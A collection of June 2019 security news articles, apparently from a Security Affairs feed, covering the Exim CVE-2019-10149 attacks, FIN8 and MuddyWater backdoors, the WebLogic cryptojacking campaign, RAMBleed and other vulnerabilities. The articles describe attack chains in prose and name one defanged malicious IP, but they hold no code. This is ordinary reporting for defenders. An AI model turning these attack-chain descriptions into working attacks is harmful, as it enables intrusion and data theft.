Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack, threat actors are exploiting the CVE-2019-10149 flaw to take over them.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim it is possible to find 3,655,524 installs most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release we can find 1,795,332 systems.

Exim

CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason..

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9, in this wave of attacks attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal.” reported ZDnet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers are currently under attack appeared first on Security Affairs.

WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector.” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.

One of the most severe issues is related to the presence of hardcoded credentials that can be used to connect the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet.” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key.” states the advisory.

SEC Consult also discovered that WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both libraries are affected by known vulnerabilities, some of which rated as critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)

The post WAGO Industrial Switches affected by multiple flaws appeared first on Security Affairs.

Ransomware paralyzed production for at least a week at ASCO factories

Malware infections could be devastating for production environments, a ransomware infection halts production operations for days at airplane parts manufacturer ASCO.

ASCO, is of the world’s largest manufacturers of aerospace components

The company has offices and production plants in Belgium, Canada, Germany the US, Brasil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed the production in ASCO plants across several countries worldwide. The attack reportedly started on Friday and at the time of writing the current extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1400 were sent home for the entire week, on paid leave.

ASCO

As a result of having IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately after ASCO also shut down for precaution production factories in Germany, Canada, and the US.

At the time is not clear if the company decided to pay the ransom to restore its systems rapidly or simply restore its backups.

Despite ASCO should be a privileged target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a targe”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)

The post Ransomware paralyzed production for at least a week at ASCO factories appeared first on Security Affairs.

Massive DDos attack hit Telegram, company says most of junk traffic is from China

Encrypted messaging service Telegram was hit by a major DDoS attack apparently originated from China, likely linked to the ongoing political unrest in Hong Kong.

Telegram was used by protesters in Hong Kong to evade surveillance and coordinate their demonstrations against China that would allow extraditions from the country to the mainland.

The country is facing the worst political crisis ùsince its 1997 handover from Britain to China.

While protesters in the country are involved in violent demonstrations repressed by the police with tear gas and rubber bullets.

At the same time, Telegram suffered a massive Distributed Denial of Service (DDoS) attack, users mainly in South and North America were affected by a significant outage, anyway, problems were observed by other users worldwide.

Hackers used a huge botnet to generate the traffic that made Telegram servers inaccessible.

However, users in other locations were also affected, as some people in Australia reported problems with loading video content.

telegram down

According to Pavel Durov, Telegram’s CEO, most of the junk traffic was originated from China.

Telegram constantly updated its users via Twitter, at the time it has restored an ordinary operation.

Telegram is one of the most popular encrypted instant messaging apps that currently has over 200 million monthly active users.

Telegram is currently blocked in China by country’s Great Firewall. Many people fear that the government of Beijing would increase influence on Hong Kong.

“The city’s special status under its handover agreement allows freedoms unseen in mainland China, but many fear they are under threat as Beijing exerts increasing influence on Hong Kong.” states the AFP.

“The current protests were sparked by fears that the proposed law would allow extraditions to China and leave people exposed to the mainland’s politicised and opaque justice system.”

Pierluigi Paganini

(SecurityAffairs – Hong Kong, DDoS)

The post Massive DDos attack hit Telegram, company says most of junk traffic is from China appeared first on Security Affairs.

Flaw in Evernote Web Clipper for Chrome extension allows stealing data

Security experts discovered a vulnerability in the popular Evernote Web Clipper for Chrome can be exploited to steal sensitive data from sites visited by users.

Security experts at browser security firm Guardio discovered a critical universal cross-site scripting (XSS) vulnerability in the Evernote Web Clipper for Chrome.

“In May 2019 Guardio’s research team has discovered a critical vulnerability in Evernote Web Clipper for Chrome.” reads a blog post published by Guardio. “A logical coding error made it is possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain.”

The vulnerability, tracked as CVE-2019-12592, could be exploited by attackers operating malicious websites to bypass the browser’s same-origin policy (SOP) and execute arbitrary code on the victim’s behalf.

The Evernote Web Clipper extension for Chrome allows users to easily save online content to Evernote, including web pages, articles, images, text, and emails. The popular extension has over 4.6 million users.

The attack scenario sees hackers tricking victims into visiting specially crafted websites that load hidden iframes.

The vulnerability discovered by the experts in the Evernote extension allows an attacker to inject a malicious payload into all iframe contexts and steal credentials, cookies, and other data.

Researchers published a video PoC of the attacks that shows how hackers can steal a user’s Facebook information and data on PayPal transactions.

The researchers also provided a description of a Proof-of-Concept (PoC) attacks to steal sensitive data from an unsuspecting user, below the attack scenario:

  1. User navigates to the attacker’s malicious website (e.g. via social media, email, a compromised blog comment, etc.).
  2. Malicious website silently loads hidden, legitimate iframe tags (link) of targeted websites.
  3. The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker controlled payload into all iframes contexts.
  4. Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.
Evernote Web Clipper for Chrome

Below the timeline of the flaw:

  • May 27th, 2019 – Initial disclosure.
  • May 28th, 2019 – Follow-up email.
  • May 28th, 2019 – Issue confirmed and classified as a vulnerability.
  • May 29th, 2019 – Credited on Evernote’s Security Page (link).
  • May 31st, 2019 – Evernote Web Clipper 7.11.1 released.
  • June 4th, 2019 – Fix confirmed.

Pierluigi Paganini

(SecurityAffairs – Evernote Web Clipper for Chrome, hacking)

The post Flaw in Evernote Web Clipper for Chrome extension allows stealing data appeared first on Security Affairs.

The Tax Paying Hacker: A Modern Phenomenon

In a dark room lit only by the light from four computer monitors sits a hacker named Hector (not his real name). You can hear the faint pulse of an EDM track coming from his headphones as Hector taps away on his computer’s keyboard. The above description could serve as the setting for a hacker […]… Read More

The post The Tax Paying Hacker: A Modern Phenomenon appeared first on The State of Security.

Google expert disclosed details of an unpatched flaw in SymCrypt library

Tavis Ormandy, a white hat hacker Google Project Zero announced to have found a zero-day flaw in the SymCrypt cryptographic library of Microsoft’s operating system.

The recently released Microsoft Patch Tuesday security updates for June 2019 failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs trigger a denial of service condition by interrupting the encryption service for other programs.

The vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. According to the Google 90-days disclosure policy, Ormandy publicly released details and proof-of-concept of the vulnerability.

Ormandy privately reported the flaw to Microsoft in March 2019, but the tech giant failed into fixing it after 90 days.

The unpatched vulnerability affects Windows 8 servers and above.

According to Microsoft, SymCrypt is the primary library for implementing symmetric cryptographic algorithms in Windows 8, it also implements asymmetric cryptographic algorithms starting with Windows 10 version 1703.

Ormandy discovered that it is possible to trigger the flaw to cause an infinite loop when making specific cryptographic operations.

“There’s a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric.” wrote the expert.

“I’ve been able to construct an X.509 certificate that triggers the bug. I’ve found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock.”

The white hat hacker used a specially crafted X.509 digital certificate to trigger the flaw, he explained that any application running on the system that processes the certificate can trigger the vulnerability.

Specially crafted certificates could be provided in multiple ways, for example in digitally signed and encrypted messages via the S/MIME protocol.

Ormandy explained that is some cases it would be necessary to reboot the vulnerable machine to return in a normal state.

Microsoft Security Response Center (MSRC) told the Google expert that the company will not able to provide a security patch before next month.

Pierluigi Paganini

(SecurityAffairs – SymCrypt, hacking)

The post Google expert disclosed details of an unpatched flaw in SymCrypt library appeared first on Security Affairs.

FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years later after the last report, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers Root9b in June 2017, the malware was used by threat actors to deliver the PoC malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in the attempt of delivering PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separated.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

The ShellTea attempt to evade detection by checking the presence of virtualized environments and standard analysis tools. The malicious code uses a hacking algorithm for most of its functions, the algorithm is similar to the one implemented for previous ShellTea version.

ShellTea is then injected into Explorer, it communicates with the C2 over HTTPs and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using downloaded native Empire ReflectivePicker, and of course downloading and executing a POS malware.

Attackers use the PowerShell script to collect information on the user and the network, then sends Gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8,we’ve seen multiple attacks by FIN6FIN7 and others.” concludes Morphisec.

Many POS networks are running on the POS version of Window 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.” ” As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses. “

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)

The post FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor appeared first on Security Affairs.

Radiohead releases a trove of stolen music in response to the hack

The English rock Radiohead released 18-hour trove of private recordings from their 1997 album “OK Computer” in response to the recent hack.

The alternative rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” after being hacked by crooks that demanded a ransom of $150,000 for the music.

Radiohead uploaded 1.8-gigabyte of recording, live performances, and some unpublished songs on their website (radiohead.bandcamp.com).

Radiohead

The hackers’ dream of making money stealing the music vanished, now anyone can access them for free.

The group is also offering for sale downloads of an album of the 18 hacked MiniDiscs for £18 and donating the proceeds to the Extinction Rebellion environmental campaign group. That’s amazing guys!

“We’ve been hacked,” explained frontman Thom Yorke.

“It’s not v interesting,” he added. “As it’s out there it may as well be out there, until we all get bored and move on.”

Below the tweet published by the group guitarist, Jonny Greenwood that confirmed the hack occurred last week.

“Someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it,” Greenwood wrote.

“So instead of complaining — much — or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion,”.

Immediately after the hack, the Reddit user ‘ u/santicol’ revealed that someone claiming to have the stolen music attempted to offer it to a “well known leaker” and offered them previews of the tracks.

“The user described how someone claiming to have the archive came in contact with a “well-known leaker” and offered them previews of the tracks.” reported the AFP press.

“They were asking upwards of $150,000 for the entire set, at $800 per studio track and $50 per live track,” added the Reddit user.

“The leaker seems to be well known in some spaces and has a history of trading in very rare/high profile material,”.

Pierluigi Paganini

(SecurityAffairs – Radiohead, hacking)

The post Radiohead releases a trove of stolen music in response to the hack appeared first on Security Affairs.

RAMBleed, a new Side-Channel Attack that allows stealing sensitive data

Security researchers disclosed the details of RAMBleed, a new type of side-channel attack on DRAM that can allow stealing sensitive data from a memory.

A team of academics from several universities has disclosed the details a new type of side-channel attack on dynamic random-access memory (DRAM), dubbed RAMBleed. The RAMBleed issue, tracked as CVE-2019-0174, could be used by attackers to potentially obtain from the system’s memory sensitive data.

RAMBleed is based on a previous side channel called Rowhammer, which enables an attacker to flip bits in the memory space of other processes. We show in our paper that an attacker, by observing Rowhammer-induced bit flips in her own memory, can deduce the values in nearby DRAM rows. Thus, RAMBleed shifts Rowhammer from being a threat not only to integrity, but confidentiality as well.” wrote the experts.

rambleed

RAMBleed is based on the Rowhammer attack technique devised by researchers at the Google Project Zero team back in 2015.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

Bit flipping technique caused by the Rowhammer problems could be exploited to evade the sendbox.

The researchers at Google Project Zero started from a previous study conducted by Yoongu Kim titled “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors”. 

In modern chip, DRAMs have a high capacity and it is hard to prevent DRAM cells from interacting electrically with each other.

The Project Zero hacking elite team demonstrated two proof-of-concept exploits that allowed them to control several x86 computers running Linux, according to the experts the attacks could work with other operating systems as well.

Now researchers from the University of Michigan, Graz University of Technology and University of Adelaide demonstrated that an attacker with limited privileges can use a Rowhammer attack to deduce bits in nearby rows. This means that an attacker could obtain data associated with other processes and the kernel.

Previous Rowhammer attack techniques were based on write side-channels, attackers leverage persistent bit flips that can be mitigated by error-correcting code (ECC) memory. RAMBleed is different because it relies on a read side-channel and it does not require persistent bit flips.

“It is widely assumed however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations. We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel.” reads the research paper. “More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel.”

The researchers developed new memory massaging techniques to carefully place the victim’s secret data in the rows above and below the attacker’s memory row, In this was they caused the bit flips in the attacker’s rows to depend on the values of the victim’s secret data.

“The attacker can then use Rowhammer to induce bit flips in her own memory, thereby leaking the victim’s secret data,” added the researchers.

The experts RAMBleed demonstrated the RAMBleed attack by targeting OpenSSH and leaking a 2048-bit RSA key, of course it is just a possible target but the technique could be used to steal other potentially sensitive data.

RAMBleed is effective work against devices using DDR3 and DDR4 memory modules, but it potentially works with many other computers.

Experts suggest to upgrade memory modules to DDR4 with targeted row refresh (TRR) enabled, because it makes hard the exploitation of the flaw.

At the time there is no evidence that RAMBleed has been exploited in attacks in the wild.

Pierluigi Paganini

(SecurityAffairs – RAMBleed, hacking)

The post RAMBleed, a new Side-Channel Attack that allows stealing sensitive data appeared first on Security Affairs.

Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws

Microsoft releases Patch Tuesday security updates for June 2019 that address 88 vulnerabilities in Windows OS and other products.

Microsoft Patch Tuesday security updates for June 2019 address 88 vulnerabilities in Windows OS and other products of the tech giant (Internet Explorer, Microsoft Edge browser, Microsoft Office and Services, ChakraCore, Skype for Business, Microsoft Lync, Microsoft Exchange Server, and Azure).

21 out of 88 flaws are rated as Critical in severity, 66 as Important, and only one of them rated as Moderate in severity.

Microsoft addressed four publicly exposed privilege escalation issues rated as important. None of these vulnerabilities was exploited in attacks in the wild.

The flaws were disclosed by the researcher SandboxEscaper over the past weeks, below the list of the issue:

One of the critical vulnerabilities fixed by Microsoft is a Windows Hyper-V Remote Code Execution issue tracked as CVE-2019-0620.

“A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.” reads the security advisory.

“An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.”

Microsoft fixes a total of three critical remote code execution vulnerabilities in Windows Hyper-V (CVE-2019-0620, CVE-2019-0709, CVE-2019-0722), the Microsoft virtualization software that allows running multiple operating systems as virtual machines on Windows.

The Remote code execution flaws in the Hyper-V allow an attacker to execute arbitrary code on the host operating system just by executing a specially crafted application on a guest operating system.

Patch Tuesday security updates for June 2019 also addressed two important severity vulnerabilities, tracked as CVE-2019-1040 and CVE-2019-1019, that affect Microsoft’s NTLM authentication protocol. The flaws could be exploited by remote attackers to bypass NTLM protection mechanisms and re-enable NTLM Relay attacks.

The full list of vulnerabilities addressed by Microsoft is available here.

Experts pointed out that Microsoft failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs trigger a denial of service condition by interrupting the encryption service for other programs.

This vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. According to the Google 90-days disclosure policy, Ormandy today publicly released details and proof-of-concept of the vulnerability.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws appeared first on Security Affairs.

Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions

Security researchers at Alert Logic have discovered a vulnerability in the WordPress Live Chat plugin that could be exploited to steal and hijack sessions.

Experts at Alert Logic have discovered a vulnerability in the popular WordPress Live Chat plugin that could be exploited by an unauthorized remote attacker to steal chat logs or manipulate chat sessions.

The critical vulnerability, tracked as CVE-2019-12498, is a critical authentication bypass issue (CWE-287 / OWASP Top 10: A2: 2017-Broken Authentication) that affects version 8.0.32 and earlier of the plugin. 

The vulnerability is caused by the improper validation check for authentication, the attacker can trigger it to access restricted REST API endpoints.

we uncovered a critical authentication bypass (CWE-287 / OWASP Top 10: A2: 2017-Broken Authentication) in version 8.0.32 and earlier.” reads the security advisory published by the experts. “This bypass allows an attacker to gain access to the REST API functionality without valid credentials—enabling exfiltration of chat logs and the ability to manipulate chat sessions.”

WP Live Chat Support provides customer support and chat with visitors through their WordPress websites, over 50,000 businesses currently use this plugin.

“The restricted REST API endpoints of the affected versions of WP Live Chat are vulnerable to abuse by unauthenticated remote attackers due to a flaw in the ‘wplc_api_permission_check()’ function.” continues the advisory.

WordPress Live Chat plugin

The REST API endpoints of unpatched WP Live Chat Support installs are potentially exposed to attacks carried out by unauthenticated remote attackers due to vulnerability in the ‘wplc_api_permission_check()’ function.”  

“The above series of ‘register_rest_route()’ calls define those REST API endpoints which should have access restrictions due to the nature of the functionality they expose,” continues the Alert Logic research team.

“Each restricted endpoint shares the same ‘permission_callback’ function, namely the ‘wplc_api_permission_check()’ function which will be explored shortly.”

A remote attacker can exploit exposed endpoints for several malicious purposes, including:

  • stealing the entire chat history for all chat sessions,
  • modifying or deleting the chat history,
  • injecting messages into an active chat session, posing as a customer support agent,
  • forcefully ending active chat sessions, as part of a denial of service (DoS) attack.

Below the timeline of the vulnerability:

Initial contact with vendor28 May 2019
Vulnerability disclosed to vendor29 May 2019
Vendor accepts vulnerability. Begins working on patch30 May 2019
Submit to NVD. CVE assigned31 May 2019
New version released. Confirmed no longer vulnerable31 May 2019
Responsible Disclosure embargo lifted10 June 2019

Fortunately, experts are not are of attacks in the wild exploiting the vulnerability.

Pierluigi Paganini

(SecurityAffairs – WordPress Live Chat plugin, hacking)

The post Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions appeared first on Security Affairs.

Customs and Border Protection (CBP) confirms hack of a subcontractor

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen by hackers.

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen as a result of a cyber attack.

The Customs and Border Protection agency did not reveal the name of the company that was involved in the incident. According to media outlets, hackers broke into the computer network of an unnamed subcontractor, many experts believe the incident could be linked to the hack of Perceptics.

At the end of May the company Perceptics, a leader in license plate readers (LPRs), license plate recognition systems and vehicle identification products, announced to have suffered a security breach. The attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.

CBP perceptics hack files 2

LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle traffic (POV) in the United States, Canada, and for the most critical lanes in Mexico.

A hacker that goes online with the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and shared with the journalists a list of files as proof of the attack.

A Customs spokesman revealed that fewer than 100,000 people have been impacted, hackers accessed to photos of travelers in vehicles entering and exiting the United States at a single land-border port of entry over one and a half months.

CBP said that stolen data are not available online or in the Dark Web.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract,” reads a statement published by the CBP.

Anyway the subcontractor was not authorized to transfer copies of the images to its infrastructure without CBP’s authorization.

The Customs and Border Protection learned of the security breach on May 31, 2019, it pointed out that hackers did not compromise its network.

“The chairman of the House Homeland Security Committee, Rep. Bennie Thompson of Mississippi, noted with alarm that this is the “second major privacy breach at DHS this year.”” reported the AP.

“We must ensure we are not expanding the use of biometrics at the expense of the privacy of the American public,” he said in a statement.

Pierluigi Paganini

(SecurityAffairs – CBP, hacking)

The post Customs and Border Protection (CBP) confirms hack of a subcontractor appeared first on Security Affairs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros), has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

The threat actors continue to evolve their TTPs, a few weeks ago Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted the usage of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage PowerStats backdoor, the experts already observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used some compromised legitimate accounts to send out spear-phishing message containing a document embedded with a malicious macro.

MuddyWater email

The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data will be decoded and saved to the %PUBLIC% directory with various names and image file extensions such as .jpeg and .png. The attackers’ PowerShell code implements a custom string obfuscation and junk stubs of code to make it difficult to analyze.

Once all the strings are deobfuscated, a final backdoor code is revealed. The malicious code backdoor first gathers operating system (OS) information and save the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exeprocess.”

The hackers can launch a second state attack by sending specific commands to the backdoor. The malicious code is also able to install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands such as taking screenshots, and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.

The hackers connect to the C2 with PHP scripts that have a hardcoded token and a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Trend Micro observed an evolution of the malicious code used by the MuddyWater group, in March and April, the hackers were using the heavily obfuscated POWERSTATS v2, but in May they deployed the new/ POWERSTATS v3 in May. 

The following table reports some of the campaigns observed by Trend Micro in H1 2019 with associated payloads and publicly available post-exploitation tools:

 tools.

Discovery Date Method for dropping malicious codeType of files droppedFinal payload
2019-01MacrosEXESHARPSTATS
2019-01MacrosINF, EXEDELPHSTATS
2019-03MacrosBase64 encoded, BATPOWERSTATS v2
2019-04Template injectionDocument with macrosPOWERSTATS v1 or v2
2019-05MacrosVBEPOWERSTATS v3

It is interesting to note that the MuddyWater attackers are not using zero-days exploits in their campaigns, anyway the threat actors continue to evolve their TTPs to avoid the detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic recently, addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

The flaw is a deserialization remote command execution zero-day vulnerability that affects the Oracle WebLogic wls9_async and wlswsat components.

The issue affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April, unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious codes in certificate files to evade detection.

CVE-2019-2725 cryptojacking

Once the malware is executed it exploits the CVE-2019-2725 flaw to execute a command and perform a series of routines. 

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chains starts with a PowerShell that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then execute it using PowerShell. The downloaded file is then deleted using cmd.

